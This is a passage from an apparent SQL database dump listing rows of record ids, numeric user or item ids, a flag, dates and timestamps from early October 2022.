03:50:24'),(61006,4363,1,'2022-10-04','2022-10-04 04:18:45'),(61007,2395,1,'2022-10-04','2022-10-04 04:46:25'),(61008,1614,1,'2022-10-04','2022-10-04 04:56:34'),(61009,4697,1,'2022-10-04','2022-10-04 05:10:07'),(61010,4420,1,'2022-10-04','2022-10-04 05:23:03'),(61011,1722,1,'2022-10-04','2022-10-04 05:32:51'),(61012,1722,1,'2022-10-04','2022-10-04 05:33:18'),(61013,1722,1,'2022-10-04','2022-10-04 05:34:04'),(61014,4335,1,'2022-10-04','2022-10-04 05:35:49'),(61015,3531,1,'2022-10-04','2022-10-04 06:20:50'),(61016,1728,1,'2022-10-04','2022-10-04 07:05:54'),(61017,72,1,'2022-10-04','2022-10-04 07:13:58'),(61018,1544,1,'2022-10-04','2022-10-04 09:36:42'),(61019,4363,1,'2022-10-04','2022-10-04 09:59:32'),(61020,2161,1,'2022-10-04','2022-10-04 09:59:32'),(61021,2148,1,'2022-10-04','2022-10-04 10:07:42'),(61022,2148,1,'2022-10-04','2022-10-04 10:08:00'),(61023,2148,1,'2022-10-04','2022-10-04 10:08:18'),(61024,2148,1,'2022-10-04','2022-10-04 10:08:58'),(61025,1728,1,'2022-10-04','2022-10-04 10:09:36'),(61026,467,1,'2022-10-04','2022-10-04 10:25:04'),(61027,3781,1,'2022-10-04','2022-10-04 10:50:21'),(61028,1594,1,'2022-10-04','2022-10-04 10:59:40'),(61029,1544,1,'2022-10-04','2022-10-04 11:16:44'),(61030,4420,1,'2022-10-04','2022-10-04 11:21:29'),(61031,3030,1,'2022-10-04','2022-10-04 11:28:11'),(61032,1610,1,'2022-10-04','2022-10-04 11:48:25'),(61033,1544,1,'2022-10-04','2022-10-04 11:49:28'),(61034,570,1,'2022-10-04','2022-10-04 12:42:35'),(61035,1588,1,'2022-10-04','2022-10-04 12:44:22'),(61036,4960,1,'2022-10-04','2022-10-04 12:56:29'),(61037,4930,1,'2022-10-04','2022-10-04 12:58:11'),(61038,4960,1,'2022-10-04','2022-10-04 12:58:46'),(61039,76,1,'2022-10-04','2022-10-04 12:58:52'),(61040,4960,1,'2022-10-04','2022-10-04 12:59:26'),(61041,3691,1,'2022-10-04','2022-10-04 13:14:24'),(61042,4950,1,'2022-10-04','2022-10-04 13:40:21'),(61043,4612,1,'2022-10-04','2022-10-04 14:29:09'),(61044,4971,1,'2022-10-04','2022-10-04 14:31:37'),(61045,2704,1,'2022-10-04','2022-10-04 14:33:09'),(61046,1544,1,'2022-10-04','2022-10-04 14:54:16'),(61047,5125,1,'2022-10-04','2022-10-04 14:57:15'),(61048,1544,1,'2022-10-04','2022-10-04 14:57:30'),(61049,68,1,'2022-10-04','2022-10-04 14:58:05'),(61050,1544,1,'2022-10-04','2022-10-04 14:58:27'),(61051,87,1,'2022-10-04','2022-10-04 15:00:12'),(61052,3030,1,'2022-10-04','2022-10-04 15:05:56'),(61053,1870,1,'2022-10-04','2022-10-04 15:09:52'),(61054,1724,1,'2022-10-04','2022-10-04 15:09:53'),(61055,1770,1,'2022-10-04','2022-10-04 15:27:13'),(61056,5071,1,'2022-10-04','2022-10-04 15:36:08'),(61057,1612,1,'2022-10-04','2022-10-04 15:47:21'),(61058,1722,1,'2022-10-04','2022-10-04 16:59:27'),(61059,4363,1,'2022-10-04','2022-10-04 17:04:59'),(61060,3307,1,'2022-10-04','2022-10-04 18:06:14'),(61061,4703,1,'2022-10-04','2022-10-04 18:53:39'),(61062,4963,1,'2022-10-04','2022-10-04 18:57:04'),(61063,1588,1,'2022-10-04','2022-10-04 19:52:58'),(61064,4694,1,'2022-10-04','2022-10-04 19:56:26'),(61065,4323,1,'2022-10-04','2022-10-04 20:21:27'),(61066,4703,1,'2022-10-04','2022-10-04 20:24:26'),(61067,4546,1,'2022-10-04','2022-10-04 20:29:39'),(61068,4546,1,'2022-10-04','2022-10-04 20:30:27'),(61069,3771,1,'2022-10-04','2022-10-04 20:32:14'),(61070,1544,1,'2022-10-04','2022-10-04 20:37:37'),(61071,2457,1,'2022-10-04','2022-10-04 20:43:29'),(61072,467,1,'2022-10-04','2022-10-04 21:00:17'),(61073,3097,1,'2022-10-04','2022-10-04 21:58:35'),(61074,335,1,'2022-10-04','2022-10-04 22:02:04'),(61075,4524,1,'2022-10-04','2022-10-04 22:41:35'),(61076,72,1,'2022-10-04','2022-10-04 23:39:43'),(61077,2297,1,'2022-10-04','2022-10-04 23:58:41'),(61078,84,1,'2022-10-05','2022-10-05 00:20:08'),(61079,4712,1,'2022-10-05','2022-10-05 00:23:06'),(61080,4966,1,'2022-10-05','2022-10-05 01:53:01'),(61081,4966,1,'2022-10-05','2022-10-05 01:53:27'),(61082,3307,1,'2022-10-05','2022-10-05 03:31:26'),(61083,4694,1,'2022-10-05','2022-10-05 03:55:25'),(61084,4874,1,'2022-10-05','2022-10-05 04:07:28'),(61085,3438,1,'2022-10-05','2022-10-05 05:20:56'),(61086,1598,1,'2022-10-05','2022-10-05 05:41:51'),(61087,335,1,'2022-10-05','2022-10-05 06:14:27'),(61088,2309,1,'2022-10-05','2022-10-05 06:44:18'),(61089,5071,1,'2022-10-05','2022-10-05 07:38:33'),(61090,3083,1,'2022-10-05','2022-10-05 08:11:41'),(61091,72,1,'2022-10-05','2022-10-05 08:14:06'),(61092,3752,1,'2022-10-05','2022-10-05 08:14:37'),(61093,3060,1,'2022-10-05','2022-10-05 09:46:03'),(61094,4996,1,'2022-10-05','2022-10-05 09:46:44'),(61095,3060,1,'2022-10-05','2022-10-05 09:49:37'),(61096,1724,1,'2022-10-05','2022-10-05 10:13:06'),(61097,3030,1,'2022-10-05','2022-10-05 10:24:16'),(61098,4396,1,'2022-10-05','2022-10-05 10:35:54'),(61099,1544,1,'2022-10-05','2022-10-05 10:40:07'),(61100,4396,1,'2022-10-05','2022-10-05 10:41:04'),(61101,4396,1,'2022-10-05','2022-10-05 10:41:20'),(61102,1604,1,'2022-10-05','2022-10-05 10:45:21'),(61103,5131,1,'2022-10-05','2022-10-05 10:54:37'),(61104,5131,1,'2022-10-05','2022-10-05 10:56:06'),(61105,5131,1,'2022-10-05','2022-10-05 10:56:43'),(61106,87,1,'2022-10-05','2022-10-05 11:31:43'),(61107,76,1,'2022-10-05','2022-10-05 11:32:21'),(61108,76,1,'2022-10-05','2022-10-05 11:33:20'),(61109,87,1,'2022-10-05','2022-10-05 11:33:24'),(61110,4363,1,'2022-10-05','2022-10-05 12:27:46'),(61111,1722,1,'2022-10-05','2022-10-05 12:28:14'),(61112,3691,1,'2022-10-05','2022-10-05 12:34:50'),(61113,1722,1,'2022-10-05','2022-10-05 14:32:53'),(61114,2395,1,'2022-10-05','2022-10-05 14:49:17'),(61115,3261,1,'2022-10-05','2022-10-05 14:53:41'),(61116,87,1,'2022-10-05','2022-10-05 15:03:44'),(61117,488,1,'2022-10-05','2022-10-05 15:04:14'),(61118,87,1,'2022-10-05','2022-10-05 15:04:35'),(61119,1877,1,'2022-10-05','2022-10-05 15:05:45'),(61120,89,1,'2022-10-05','2022-10-05 15:06:26'),(61121,1600,1,'2022-10-05','2022-10-05 15:07:02'),(61122,72,1,'2022-10-05','2022-10-05 15:10:16'),(61123,91,1,'2022-10-05','2022-10-05 15:13:20'),(61124,5067,1,'2022-10-05','2022-10-05 15:16:04'),(61125,5067,1,'2022-10-05','2022-10-05 15:16:05'),(61126,91,1,'2022-10-05','2022-10-05 15:19:59'),(61127,4966,1,'2022-10-05','2022-10-05 15:24:04'),(61128,72,1,'2022-10-05','2022-10-05 16:12:47'),(61129,4436,1,'2022-10-05','2022-10-05 16:59:55'),(61130,335,1,'2022-10-05','2022-10-05 17:17:28'),(61131,3781,1,'2022-10-05','2022-10-05 18:12:12'),(61132,1604,1,'2022-10-05','2022-10-05 18:34:08'),(61133,469,1,'2022-10-05','2022-10-05 18:34:56'),(61134,3674,1,'2022-10-05','2022-10-05 18:56:47'),(61135,5109,1,'2022-10-05','2022-10-05 20:10:54'),(61136,74,1,'2022-10-05','2022-10-05 20:52:02'),(61137,1608,1,'2022-10-05','2022-10-05 20:52:02'),(61138,108,1,'2022-10-05','2022-10-05 20:52:11'),(61139,4988,1,'2022-10-05','2022-10-05 20:52:12'),(61140,2309,1,'2022-10-05','2022-10-05 20:52:21'),(61141,4930,1,'2022-10-05','2022-10-05 20:52:24'),(61142,1600,1,'2022-10-05','2022-10-05 20:52:29'),(61143,1598,1,'2022-10-05','2022-10-05 20:52:37'),(61144,467,1,'2022-10-05','2022-10-05 20:52:40'),(61145,1872,1,'2022-10-05','2022-10-05 20:52:46'),(61146,1544,1,'2022-10-05','2022-10-05 20:52:47'),(61147,472,1,'2022-10-05','2022-10-05 20:52:50'),(61148,4335,1,'2022-10-05','2022-10-05 20:52:55'),(61149,1586,1,'2022-10-05','2022-10-05 20:52:57'),(61150,1602,1,'2022-10-05','2022-10-05 20:53:01'),(61151,335,1,'2022-10-05','2022-10-05 20:53:07'),(61152,80,1,'2022-10-05','2022-10-05 20:53:12'),(61153,1877,1,'2022-10-05','2022-10-05 20:53:17'),(61154,84,1,'2022-10-05','2022-10-05 20:53:27'),(61155,1594,1,'2022-10-05','2022-10-05 20:53:39'),(61156,4983,1,'2022-10-05','2022-10-05 20:53:39'),(61157,87,1,'2022-10-05','2022-10-05 20:53:50'),(61158,1606,1,'2022-10-05','2022-10-05 20:54:23'),(61159,1594,1,'2022-10-05','2022-10-05 21:13:55'),(61160,76,1,'2022-10-05','2022-10-05 21:15:43'),(61161,2964,1,'2022-10-05','2022-10-05 21:29:08'),(61162,3438,1,'2022-10-05','2022-10-05 21:33:00'),(61163,1711,1,'2022-10-05','2022-10-05 21:43:57'),(61164,1711,1,'2022-10-05','2022-10-05 21:44:04'),(61165,87,1,'2022-10-05','2022-10-05 23:38:22'),(61166,87,1,'2022-10-05','2022-10-05 23:39:34'),(61167,87,1,'2022-10-05','2022-10-05 23:40:36'),(61168,72,1,'2022-10-06','2022-10-06 00:12:21'),(61169,335,1,'2022-10-06','2022-10-06 00:33:00'),(61170,3781,1,'2022-10-06','2022-10-06 00:35:56'),(61171,5109,1,'2022-10-06','2022-10-06 01:18:02'),(61172,2911,1,'2022-10-06','2022-10-06 01:28:11'),(61173,2769,1,'2022-10-06','2022-10-06 02:18:02'),(61174,3742,1,'2022-10-06','2022-10-06 02:48:23'),(61175,4759,1,'2022-10-06','2022-10-06 02:58:25'),(61176,5125,1,'2022-10-06','2022-10-06 03:18:02'),(61177,2775,1,'2022-10-06','2022-10-06 03:37:04'),(61178,2911,1,'2022-10-06','2022-10-06 03:42:45'),(61179,4756,1,'2022-10-06','2022-10-06 03:43:35'),(61180,4759,1,'2022-10-06','2022-10-06 04:27:18'),(61181,3060,1,'2022-10-06','2022-10-06 04:47:59'),(61182,4551,1,'2022-10-06','2022-10-06 04:58:46'),(61183,3117,1,'2022-10-06','2022-10-06 05:42:01'),(61184,1544,1,'2022-10-06','2022-10-06 06:00:10'),(61185,4888,1,'2022-10-06','2022-10-06 06:18:34'),(61186,4744,1,'2022-10-06','2022-10-06 06:29:25'),(61187,4524,1,'2022-10-06','2022-10-06 06:53:59'),(61188,3297,1,'2022-10-06','2022-10-06 07:12:01'),(61189,4765,1,'2022-10-06','2022-10-06 08:14:31'),(61190,72,1,'2022-10-06','2022-10-06 08:14:53'),(61191,4966,1,'2022-10-06','2022-10-06 08:20:02'),(61192,4960,1,'2022-10-06','2022-10-06 08:20:55'),(61193,3102,1,'2022-10-06','2022-10-06 08:24:26'),(61194,5080,1,'2022-10-06','2022-10-06 08:47:32'),(61195,1544,1,'2022-10-06','2022-10-06 08:49:40'),(61196,72,1,'2022-10-06','2022-10-06 08:50:02'),(61197,1544,1,'2022-10-06','2022-10-06 08:50:49'),(61198,1695,1,'2022-10-06','2022-10-06 09:07:17'),(61199,4771,1,'2022-10-06','2022-10-06 09:18:21'),(61200,1598,1,'2022-10-06','2022-10-06 09:46:29'),(61201,91,1,'2022-10-06','2022-10-06 09:47:10'),(61202,2148,1,'2022-10-06','2022-10-06 10:02:32'),(61203,2148,1,'2022-10-06','2022-10-06 10:02:43'),(61204,2148,1,'2022-10-06','2022-10-06 10:03:05'),(61205,4657,1,'2022-10-06','2022-10-06 10:16:47'),(61206,4771,1,'2022-10-06','2022-10-06 10:29:34'),(61207,2769,1,'2022-10-06','2022-10-06 10:30:05'),(61208,2769,1,'2022-10-06','2022-10-06 10:39:35'),(61209,4457,1,'2022-10-06','2022-10-06 10:45:34'),(61210,4911,1,'2022-10-06','2022-10-06 10:57:01'),(61211,4645,1,'2022-10-06','2022-10-06 11:21:18'),(61212,3030,1,'2022-10-06','2022-10-06 11:26:31'),(61213,1586,1,'2022-10-06','2022-10-06 11:47:05'),(61214,2775,1,'2022-10-06','2022-10-06 11:59:59'),(61215,4238,1,'2022-10-06','2022-10-06 12:24:15'),(61216,1722,1,'2022-10-06','2022-10-06 12:28:27'),(61217,1722,1,'2022-10-06','2022-10-06 12:32:20'),(61218,4966,1,'2022-10-06','2022-10-06 12:36:14'),(61219,4556,1,'2022-10-06','2022-10-06 12:44:59'),(61220,3664,1,'2022-10-06','2022-10-06 13:05:45'),(61221,5062,1,'2022-10-06','2022-10-06 14:05:05'),(61222,5062,1,'2022-10-06','2022-10-06 14:05:12'),(61223,4963,1,'2022-10-06','2022-10-06 14:15:03'),(61224,3714,1,'2022-10-06','2022-10-06 14:59:59'),(61225,4608,1,'2022-10-06','2022-10-06 15:23:08'),(61226,3278,1,'2022-10-06','2022-10-06 15:23:09'),(61227,76,1,'2022-10-06','2022-10-06 16:00:46'),(61228,5062,1,'2022-10-06','2022-10-06 16:08:18'),(61229,72,1,'2022-10-06','2022-10-06 16:13:26'),(61230,76,1,'2022-10-06','2022-10-06 16:15:08'),(61231,4776,1,'2022-10-06','2022-10-06 16:44:59'),(61232,4432,1,'2022-10-06','2022-10-06 16:53:09'),(61233,335,1,'2022-10-06','2022-10-06 17:00:00'),(61234,4416,1,'2022-10-06','2022-10-06 17:15:46'),(61235,4416,1,'2022-10-06','2022-10-06 17:17:04'),(61236,1722,1,'2022-10-06','2022-10-06 17:20:57'),(61237,1722,1,'2022-10-06','2022-10-06 17:21:59'),(61238,1695,1,'2022-10-06','2022-10-06 17:26:15'),(61239,1594,1,'2022-10-06','2022-10-06 18:15:00'),(61240,3006,1,'2022-10-06','2022-10-06 18:37:48'),(61241,1728,1,'2022-10-06','2022-10-06 18:41:35'),(61242,1728,1,'2022-10-06','2022-10-06 18:43:48'),(61243,469,1,'2022-10-06','2022-10-06 18:45:27'),(61244,1728,1,'2022-10-06','2022-10-06 18:48:39'),(61245,3045,1,'2022-10-06','2022-10-06 19:00:13'),(61246,72,1,'2022-10-06','2022-10-06 19:20:04'),(61247,3083,1,'2022-10-06','2022-10-06 19:30:02'),(61248,486,1,'2022-10-06','2022-10-06 21:13:55'),(61249,1606,1,'2022-10-06','2022-10-06 21:15:03'),(61250,1606,1,'2022-10-06','2022-10-06 21:15:06'),(61251,4966,1,'2022-10-06','2022-10-06 21:17:20'),(61252,2248,1,'2022-10-06','2022-10-06 21:19:25'),(61253,4703,1,'2022-10-06','2022-10-06 21:21:24'),(61254,4323,1,'2022-10-06','2022-10-06 21:21:38'),(61255,4944,1,'2022-10-06','2022-10-06 22:26:43'),(61256,4457,1,'2022-10-06','2022-10-06 22:28:10'),(61257,4762,1,'2022-10-06','2022-10-06 23:21:18'),(61258,3781,1,'2022-10-06','2022-10-06 23:49:01'),(61259,3781,1,'2022-10-06','2022-10-06 23:49:02'),(61260,72,1,'2022-10-07','2022-10-07 00:14:53'),(61261,3030,1,'2022-10-07','2022-10-07 00:39:22'),(61262,80,1,'2022-10-07','2022-10-07 00:59:33'),(61263,1582,1,'2022-10-07','2022-10-07 02:32:29'),(61264,570,1,'2022-10-07','2022-10-07 05:21:55'),(61265,1544,1,'2022-10-07','2022-10-07 05:28:21'),(61266,1544,1,'2022-10-07','2022-10-07 05:28:23'),(61267,72,1,'2022-10-07','2022-10-07 05:35:04'),(61268,1544,1,'2022-10-07','2022-10-07 05:46:08'),(61269,3764,1,'2022-10-07','2022-10-07 06:08:02'),(61270,4524,1,'2022-10-07','2022-10-07 06:39:48'),(61271,72,1,'2022-10-07','2022-10-07 08:20:06'),(61272,1728,1,'2022-10-07','2022-10-07 08:43:25'),(61273,76,1,'2022-10-07','2022-10-07 08:47:12'),(61274,4551,1,'2022-10-07','2022-10-07 08:49:26'),(61275,1588,1,'2022-10-07','2022-10-07 10:44:31'),(61276,1588,1,'2022-10-07','2022-10-07 10:47:22'),(61277,1594,1,'2022-10-07','2022-10-07 11:14:49'),(61278,4677,1,'2022-10-07','2022-10-07 11:46:57'),(61279,1612,1,'2022-10-07','2022-10-07 12:06:39'),(61280,80,1,'2022-10-07','2022-10-07 12:06:57'),(61281,1612,1,'2022-10-07','2022-10-07 12:07:15'),(61282,1614,1,'2022-10-07','2022-10-07 12:19:59'),(61283,80,1,'2022-10-07','2022-10-07 12:20:13'),(61284,80,1,'2022-10-07','2022-10-07 12:21:08'),(61285,4412,1,'2022-10-07','2022-10-07 12:35:56'),(61286,3030,1,'2022-10-07','2022-10-07 12:47:12'),(61287,5140,1,'2022-10-07','2022-10-07 12:51:53'),(61288,2904,1,'2022-10-07','2022-10-07 13:04:36'),(61289,1612,1,'2022-10-07','2022-10-07 13:15:16'),(61290,80,1,'2022-10-07','2022-10-07 13:16:46'),(61291,1612,1,'2022-10-07','2022-10-07 13:16:59'),(61292,4977,1,'2022-10-07','2022-10-07 13:34:34'),(61293,1602,1,'2022-10-07','2022-10-07 13:40:28'),(61294,1582,1,'2022-10-07','2022-10-07 14:00:31'),(61295,1600,1,'2022-10-07','2022-10-07 15:04:43'),(61296,1544,1,'2022-10-07','2022-10-07 15:14:58'),(61297,1598,1,'2022-10-07','2022-10-07 15:23:51'),(61298,1600,1,'2022-10-07','2022-10-07 15:28:13'),(61299,72,1,'2022-10-07','2022-10-07 16:18:03'),(61300,1594,1,'2022-10-07','2022-10-07 16:47:56'),(61301,4412,1,'2022-10-07','2022-10-07 17:21:54'),(61302,4703,1,'2022-10-07','2022-10-07 17:27:33'),(61303,3109,1,'2022-10-07','2022-10-07 17:59:48'),(61304,1703,1,'2022-10-07','2022-10-07 18:14:49'),(61305,1745,1,'2022-10-07','2022-10-07 19:39:24'),(61306,1544,1,'2022-10-07','2022-10-07 20:32:50'),(61307,1544,1,'2022-10-07','2022-10-07 20:32:50'),(61308,4996,1,'2022-10-07','2022-10-07 21:34:54'),(61309,1614,1,'2022-10-07','2022-10-07 21:34:57'),(61310,1544,1,'2022-10-07','2022-10-07 21:39:45'),(61311,1544,1,'2022-10-07','2022-10-07 21:42:04'),(61312,3030,1,'2022-10-07','2022-10-07 22:26:32'),(61313,1608,1,'2022-10-07','2022-10-07 22:30:02'),(61314,3030,1,'2022-10-07','2022-10-07 22:38:57'),(61315,2904,1,'2022-10-07','2022-10-07 23:58:05'),(61316,2904,1,'2022-10-07','2022-10-07 23:59:39'),(61317,2904,1,'2022-10-08','2022-10-08 00:34:27'),(61318,1586,1,'2022-10-08','2022-10-08 01:28:06'),(61319,570,1,'2022-10-08','2022-10-08 01:30:30'),(61320,4457,1,'2022-10-08','2022-10-08 01:52:47'),(61321,4529,1,'2022-10-08','2022-10-08 02:19:02'),(61322,4776,1,'2022-10-08','2022-10-08 02:19:06'),(61323,4524,1,'2022-10-08','2022-10-08 02:19:07'),(61324,3764,1,'2022-10-08','2022-10-08 02:19:09'),(61325,2558,1,'2022-10-08','2022-10-08 02:20:41'),(61326,1872,1,'2022-10-08','2022-10-08 02:20:52'),(61327,4582,1,'2022-10-08','2022-10-08 02:20:56'),(61328,1606,1,'2022-10-08','2022-10-08 02:26:29'),(61329,570,1,'2022-10-08','2022-10-08 02:49:55'),(61330,2558,1,'2022-10-08','2022-10-08 03:05:11'),(61331,1606,1,'2022-10-08','2022-10-08 03:05:58'),(61332,72,1,'2022-10-08','2022-10-08 04:02:44'),(61333,1596,1,'2022-10-08','2022-10-08 04:03:05'),(61334,3107,1,'2022-10-08','2022-10-08 04:08:09'),(61335,1606,1,'2022-10-08','2022-10-08 04:18:09'),(61336,4660,1,'2022-10-08','2022-10-08 04:29:37'),(61337,4657,1,'2022-10-08','2022-10-08 05:09:00'),(61338,4404,1,'2022-10-08','2022-10-08 05:16:41'),(61339,3030,1,'2022-10-08','2022-10-08 05:28:45'),(61340,4648,1,'2022-10-08','2022-10-08 05:48:30'),(61341,472,1,'2022-10-08','2022-10-08 05:50:24'),(61342,4654,1,'2022-10-08','2022-10-08 06:08:07'),(61343,80,1,'2022-10-08','2022-10-08 06:14:24'),(61344,4645,1,'2022-10-08','2022-10-08 06:29:25'),(61345,80,1,'2022-10-08','2022-10-08 06:31:38'),(61346,2248,1,'2022-10-08','2022-10-08 06:35:49'),(61347,4960,1,'2022-10-08','2022-10-08 06:52:55'),(61348,3030,1,'2022-10-08','2022-10-08 07:11:10'),(61349,4663,1,'2022-10-08','2022-10-08 07:13:21'),(61350,4412,1,'2022-10-08','2022-10-08 07:28:37'),(61351,68,1,'2022-10-08','2022-10-08 07:43:43'),(61352,4663,1,'2022-10-08','2022-10-08 08:01:20'),(61353,3045,1,'2022-10-08','2022-10-08 08:06:27'),(61354,1608,1,'2022-10-08','2022-10-08 08:12:28'),(61355,72,1,'2022-10-08','2022-10-08 08:18:16'),(61356,4428,1,'2022-10-08','2022-10-08 09:42:27'),(61357,2911,1,'2022-10-08','2022-10-08 09:42:29'),(61358,2658,1,'2022-10-08','2022-10-08 09:59:54'),(61359,4651,1,'2022-10-08','2022-10-08 10:14:48'),(61360,1544,1,'2022-10-08','2022-10-08 11:43:24'),(61361,1544,1,'2022-10-08','2022-10-08 11:43:25'),(61362,1586,1,'2022-10-08','2022-10-08 13:15:24'),(61363,1544,1,'2022-10-08','2022-10-08 13:38:10'),(61364,1544,1,'2022-10-08','2022-10-08 13:38:10'),(61365,1544,1,'2022-10-08','2022-10-08 13:38:20'),(61366,1544,1,'2022-10-08','2022-10-08 13:40:28'),(61367,3030,1,'2022-10-08','2022-10-08 14:04:37'),(61368,1596,1,'2022-10-08','2022-10-08 14:30:09'),(61369,5125,1,'2022-10-08','2022-10-08 14:30:23'),(61370,4911,1,'2022-10-08','2022-10-08 15:07:42'),(61371,2911,1,'2022-10-08','2022-10-08 15:14:52'),(61372,3107,1,'2022-10-08','2022-10-08 15:43:58'),(61373,4424,1,'2022-10-08','2022-10-08 15:59:53'),(61374,4424,1,'2022-10-08','2022-10-08 16:00:00'),(61375,2609,1,'2022-10-08','2022-10-08 16:00:35'),(61376,2609,1,'2022-10-08','2022-10-08 16:04:09'),(61377,2609,1,'2022-10-08','2022-10-08 16:04:26'),(61378,2609,1,'2022-10-08','2022-10-08 16:05:32'),(61379,72,1,'2022-10-08','2022-10-08 16:18:13'),(61380,4622,1,'2022-10-08','2022-10-08 18:23:11'),(61381,469,1,'2022-10-08','2022-10-08 18:59:29'),(61382,1602,1,'2022-10-08','2022-10-08 19:08:12'),(61383,1602,1,'2022-10-08','2022-10-08 19:08:16'),(61384,1544,1,'2022-10-08','2022-10-08 19:09:10'),(61385,3489,1,'2022-10-08','2022-10-08 19:16:52'),(61386,3030,1,'2022-10-08','2022-10-08 19:40:07'),(61387,1600,1,'2022-10-08','2022-10-08 19:50:02'),(61388,3313,1,'2022-10-08','2022-10-08 20:07:24'),(61389,4911,1,'2022-10-08','2022-10-08 20:42:17'),(61390,4911,1,'2022-10-08','2022-10-08 20:59:37'),(61391,3030,1,'2022-10-08','2022-10-08 21:10:25'),(61392,1544,1,'2022-10-08','2022-10-08 21:24:28'),(61393,1586,1,'2022-10-08','2022-10-08 22:13:26'),(61394,4963,1,'2022-10-08','2022-10-08 22:23:44'),(61395,4966,1,'2022-10-08','2022-10-08 22:50:06'),(61396,1743,1,'2022-10-08','2022-10-08 23:24:07'),(61397,3087,1,'2022-10-08','2022-10-08 23:46:43'),(61398,76,1,'2022-10-08','2022-10-08 23:53:00'),(61399,3092,1,'2022-10-09','2022-10-09 00:06:54'),(61400,2769,1,'2022-10-09','2022-10-09 00:35:28'),(61401,335,1,'2022-10-09','2022-10-09 00:48:38'),(61402,1586,1,'2022-10-09','2022-10-09 01:04:00'),(61403,3030,1,'2022-10-09','2022-10-09 01:30:41'),(61404,1741,1,'2022-10-09','2022-10-09 01:43:09'),(61405,1741,1,'2022-10-09','2022-10-09 01:43:37'),(61406,3092,1,'2022-10-09','2022-10-09 02:06:38'),(61407,5062,1,'2022-10-09','2022-10-09 02:12:17'),(61408,72,1,'2022-10-09','2022-10-09 02:55:30'),(61409,4963,1,'2022-10-09','2022-10-09 03:09:19'),(61410,2769,1,'2022-10-09','2022-10-09 04:12:28'),(61411,2911,1,'2022-10-09','2022-10-09 04:20:10'),(61412,1544,1,'2022-10-09','2022-10-09 04:58:22'),(61413,1544,1,'2022-10-09','2022-10-09 04:58:24'),(61414,3664,1,'2022-10-09','2022-10-09 05:04:19'),(61415,1582,1,'2022-10-09','2022-10-09 05:46:52'),(61416,1602,1,'2022-10-09','2022-10-09 06:02:12'),(61417,1602,1,'2022-10-09','2022-10-09 06:02:16'),(61418,3313,1,'2022-10-09','2022-10-09 06:38:48'),(61419,1722,1,'2022-10-09','2022-10-09 07:18:17'),(61420,1722,1,'2022-10-09','2022-10-09 07:19:10'),(61421,1722,1,'2022-10-09','2022-10-09 07:19:41'),(61422,4911,1,'2022-10-09','2022-10-09 07:23:50'),(61423,1582,1,'2022-10-09','2022-10-09 07:37:45'),(61424,1586,1,'2022-10-09','2022-10-09 08:15:52'),(61425,1598,1,'2022-10-09','2022-10-09 08:22:45'),(61426,1751,1,'2022-10-09','2022-10-09 08:28:24'),(61427,3486,1,'2022-10-09','2022-10-09 08:46:34'),(61428,3313,1,'2022-10-09','2022-10-09 09:07:48'),(61429,5037,1,'2022-10-09','2022-10-09 10:29:13'),(61430,72,1,'2022-10-09','2022-10-09 10:54:41'),(61431,472,1,'2022-10-09','2022-10-09 11:45:30'),(61432,470,1,'2022-10-09','2022-10-09 11:47:54'),(61433,4762,1,'2022-10-09','2022-10-09 12:23:20'),(61434,4874,1,'2022-10-09','2022-10-09 12:39:09'),(61435,2420,1,'2022-10-09','2022-10-09 12:55:18'),(61436,3764,1,'2022-10-09','2022-10-09 13:28:52'),(61437,4301,1,'2022-10-09','2022-10-09 13:37:45'),(61438,3764,1,'2022-10-09','2022-10-09 13:38:21'),(61439,1604,1,'2022-10-09','2022-10-09 15:50:52'),(61440,1602,1,'2022-10-09','2022-10-09 15:56:16'),(61441,3313,1,'2022-10-09','2022-10-09 16:15:14'),(61442,3764,1,'2022-10-09','2022-10-09 16:46:25'),(61443,2769,1,'2022-10-09','2022-10-09 17:00:15'),(61444,4520,1,'2022-10-09','2022-10-09 17:22:44'),(61445,4387,1,'2022-10-09','2022-10-09 17:45:13'),(61446,2769,1,'2022-10-09','2022-10-09 18:08:17'),(61447,4520,1,'2022-10-09','2022-10-09 18:52:43'),(61448,5134,1,'2022-10-09','2022-10-09 19:02:54'),(61449,1582,1,'2022-10-09','2022-10-09 19:15:17'),(61450,2813,1,'2022-10-09','2022-10-09 19:23:16'),(61451,3030,1,'2022-10-09','2022-10-09 20:21:16'),(61452,1602,1,'2022-10-09','2022-10-09 20:45:14'),(61453,3102,1,'2022-10-09','2022-10-09 20:56:15'),(61454,4706,1,'2022-10-09','2022-10-09 21:24:51'),(61455,3664,1,'2022-10-09','2022-10-09 21:31:51'),(61456,2159,1,'2022-10-09','2022-10-09 21:31:53'),(61457,72,1,'2022-10-09','2022-10-09 22:12:28'),(61458,4983,1,'2022-10-09','2022-10-09 22:15:16'),(61459,4941,1,'2022-10-09','2022-10-09 22:18:21'),(61460,3721,1,'2022-10-09','2022-10-09 23:01:52'),(61461,2993,1,'2022-10-09','2022-10-09 23:01:54'),(61462,4941,1,'2022-10-09','2022-10-09 23:36:04'),(61463,4654,1,'2022-10-09','2022-10-09 23:45:21'),(61464,4654,1,'2022-10-09','2022-10-09 23:45:26'),(61465,5042,1,'2022-10-10','2022-10-10 01:03:53'),(61466,2297,1,'2022-10-10','2022-10-10 01:04:51'),(61467,3721,1,'2022-10-10','2022-10-10 01:06:06'),(61468,108,1,'2022-10-10','2022-10-10 01:11:10'),(61469,108,1,'2022-10-10','2022-10-10 01:11:14'),(61470,91,1,'2022-10-10','2022-10-10 01:11:16'),(61471,4428,1,'2022-10-10','2022-10-10 01:48:52'),(61472,3781,1,'2022-10-10','2022-10-10 02:11:11'),(61473,2297,1,'2022-10-10','2022-10-10 02:34:49'),(61474,91,1,'2022-10-10','2022-10-10 02:35:06'),(61475,4944,1,'2022-10-10','2022-10-10 02:41:07'),(61476,5137,1,'2022-10-10','2022-10-10 02:42:00'),(61477,2911,1,'2022-10-10','2022-10-10 03:10:03'),(61478,5137,1,'2022-10-10','2022-10-10 04:10:16'),(61479,1608,1,'2022-10-10','2022-10-10 04:11:08'),(61480,4651,1,'2022-10-10','2022-10-10 05:07:05'),(61481,1544,1,'2022-10-10','2022-10-10 05:08:19'),(61482,4645,1,'2022-10-10','2022-10-10 05:19:53'),(61483,4657,1,'2022-10-10','2022-10-10 05:33:18'),(61484,470,1,'2022-10-10','2022-10-10 05:37:55'),(61485,4654,1,'2022-10-10','2022-10-10 05:45:42'),(61486,4660,1,'2022-10-10','2022-10-10 05:58:27'),(61487,4648,1,'2022-10-10','2022-10-10 06:11:21'),(61488,4983,1,'2022-10-10','2022-10-10 06:20:01'),(61489,4663,1,'2022-10-10','2022-10-10 06:24:10'),(61490,1877,1,'2022-10-10','2022-10-10 06:37:02'),(61491,68,1,'2022-10-10','2022-10-10 